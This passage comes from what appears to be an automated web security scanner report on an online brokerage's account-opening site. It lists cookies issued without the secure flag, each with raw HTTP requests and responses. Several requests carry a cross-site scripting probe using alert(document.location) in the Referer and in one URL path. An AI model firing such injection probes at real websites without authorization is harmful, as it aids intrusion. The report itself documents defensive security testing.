Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

6.5. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

6.6. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

6.7. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.8. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.9. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.10. https://account.optionsxpress.com/css/oxps.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

6.11. https://account.optionsxpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

6.12. https://account.optionsxpress.com/images/btn_next_step.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.X..
...[SNIP]...

6.13. https://account.optionsxpress.com/images/icon_arrow.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..............................................................................................................
...[SNIP]...

6.14. https://account.optionsxpress.com/images/icons/log_in.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a2.&....]...........{........6b|........................P}.U..........................l....................Iv.........................Ly..........z...........z....................................
...[SNIP]...

6.15. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

GIF89a..8..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

6.16. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.17. https://account.optionsxpress.com/images/minus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@.-`..$...(FC.V. ..h,....z..D.@T`F....0XF.Iazi.B.;

6.18. https://account.optionsxpress.com/images/newaccount/account_select1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a........................................................................................................................................................................................}.........
...[SNIP]...

6.19. https://account.optionsxpress.com/images/newaccount/account_select2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

GIF89a............u..x............nK6.......................wnYG.W8..g..|.yZ.vW.......e\......[0.wdQ.........lki.]B..e......ZUN..}.............fG.xh.jI.|^................W<..l.........................
...[SNIP]...

6.20. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
